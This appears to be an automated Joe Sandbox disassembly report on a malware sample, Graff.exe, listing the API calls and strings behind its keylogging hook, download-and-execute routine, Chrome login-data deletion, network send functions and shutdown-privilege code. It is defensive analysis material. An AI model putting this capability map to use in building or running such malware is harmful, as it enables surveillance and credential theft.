Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 4734e1aacaf28241883502cce6c7bfad56667ccc56eb0d53747b684aa1eb3812
Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
Opcode Fuzzy Hash: 4734e1aacaf28241883502cce6c7bfad56667ccc56eb0d53747b684aa1eb3812
Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A

Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
IsValidCodePage.KERNEL32(00000000), ref: 0045151E
IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594

Strings

<D, xrefs: 00451499, 004514EC, 0045148E
<D, xrefs: 004513CD, 0045156C
<D, xrefs: 004513E0, 004513F0, 004514B0, 00451452, 00451447, 0045144A, 00451455, 004514B3

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: <D$<D$<D
API String ID: 745075371-3495170934
Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769

Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
GetLastError.KERNEL32 ref: 00409A1B

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
TranslateMessage.USER32(?), ref: 00409A7A
DispatchMessageA.USER32(?), ref: 00409A85

Strings

`Mw, xrefs: 00409A01
Keylogger initialization failure: error , xrefs: 00409A32

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $`Mw
API String ID: 3219506041-1277971878
Opcode ID: c6496649873967fb7157bfb50db8f419c891fdf83572bb8f1281ec770d2d487b
Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
Opcode Fuzzy Hash: c6496649873967fb7157bfb50db8f419c891fdf83572bb8f1281ec770d2d487b
Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536

Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C

FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69

Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633

Strings

XCG, xrefs: 00418D49
>G, xrefs: 00418C99
`HG, xrefs: 00418E3C
@CG, xrefs: 00418D5F
`HG, xrefs: 00418FA2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: @CG$XCG$`HG$`HG$>G
API String ID: 341183262-3780268858
Opcode ID: c47dcef1cf680005a63f344c9a4961512f5cb4deec4a33b700e6b3344d4b6b79
Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
Opcode Fuzzy Hash: c47dcef1cf680005a63f344c9a4961512f5cb4deec4a33b700e6b3344d4b6b79
Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A

Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
GetProcAddress.KERNEL32(00000000), ref: 004131F4

Strings

Shlwapi.dll, xrefs: 004131E8
SHDeleteKeyW, xrefs: 004131E3

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 4510992568683477671674c3c7559f0a7d7f1bb66302b15250ae60e32f6fbf92
Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
Opcode Fuzzy Hash: 4510992568683477671674c3c7559f0a7d7f1bb66302b15250ae60e32f6fbf92
Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB

Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
GetLastError.KERNEL32 ref: 0040B261

Strings

UserProfile, xrefs: 0040B227
[Chrome StoredLogins not found], xrefs: 0040B27B
[Chrome StoredLogins found, cleared!], xrefs: 0040B287
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 3b9399f2d24f4914290ed29383b987cea568855afe0e7ff380805dd8c9e9718d
Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
Opcode Fuzzy Hash: 3b9399f2d24f4914290ed29383b987cea568855afe0e7ff380805dd8c9e9718d
Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE

Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
GetLastError.KERNEL32 ref: 00416B02

Strings

SeShutdownPrivilege, xrefs: 00416AD7

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5

Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004089AE

Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,015B9780,00000010), ref: 004042A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C

Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811

__CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
String ID:
API String ID: 4043647387-0
Opcode ID: 0c6c94a2afebd0b579921cbfa5be4422fac2b9819020c8c0a0955d343c320800
Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
Opcode Fuzzy Hash: 0c6c94a2afebd0b579921cbfa5be4422fac2b9819020c8c0a0955d343c320800
Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98

Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9

Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02

ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
GetProcAddress.KERNEL32(00000000), ref: 00415977

Strings

PowrProf.dll, xrefs: 0041596B
SetSuspendState, xrefs: 00415966

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: fc7833fc160ff6be0920cbf82a71c3f8de648a2e06b3935451e168940329034b
Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
Opcode Fuzzy Hash: fc7833fc160ff6be0920cbf82a71c3f8de648a2e06b3935451e168940329034b
Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E

Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA

Strings

ACP, xrefs: 00451201
OCP, xrefs: 00451237

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799

Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407A91
FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 116f7d4fb821407afd258aa6374a3e16365488166186708e8770db4cab071448
Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
Opcode Fuzzy Hash: 116f7d4fb821407afd258aa6374a3e16365488166186708e8770db4cab071448
Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99

Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
_free.LIBCMT ref: 00448067

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58

Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318

Strings

C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 0040627F, 004063A7
open, xrefs: 0040622E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe$open
API String ID: 2825088817-1029524562
Opcode ID: b5bd0142186881fa6e4b9100fdb63cb37764026dddcd36a7bcf07cae596eeb45
Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
Opcode Fuzzy Hash: b5bd0142186881fa6e4b9100fdb63cb37764026dddcd36a7bcf07cae596eeb45
Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B

Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Strings

x@G, xrefs: 00406BC0
x@G, xrefs: 00406AFD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: x@G$x@G
API String ID: 4113138495-3390264752
Opcode ID: 5e2632628e436c4e9574beb0f9b7b14082c97a5ad97771945c338be3c941156e
Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
Opcode Fuzzy Hash: 5e2632628e436c4e9574beb0f9b7b14082c97a5ad97771945c338be3c941156e
Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B

Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C

Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
Part of subcall function 004126D2: RegCloseKey.ADVAPI32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

WallpaperStyle, xrefs: 0041BBB7, 0041BBEA, 0041BC3A
Control Panel\Desktop, xrefs: 0041BBB2, 0041BBE5, 0041BC35
TileWallpaper, xrefs: 0041BC56

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF

Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
_wcschr.LIBVCRUNTIME ref: 00450BF1
_wcschr.LIBVCRUNTIME ref: 00450BFF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

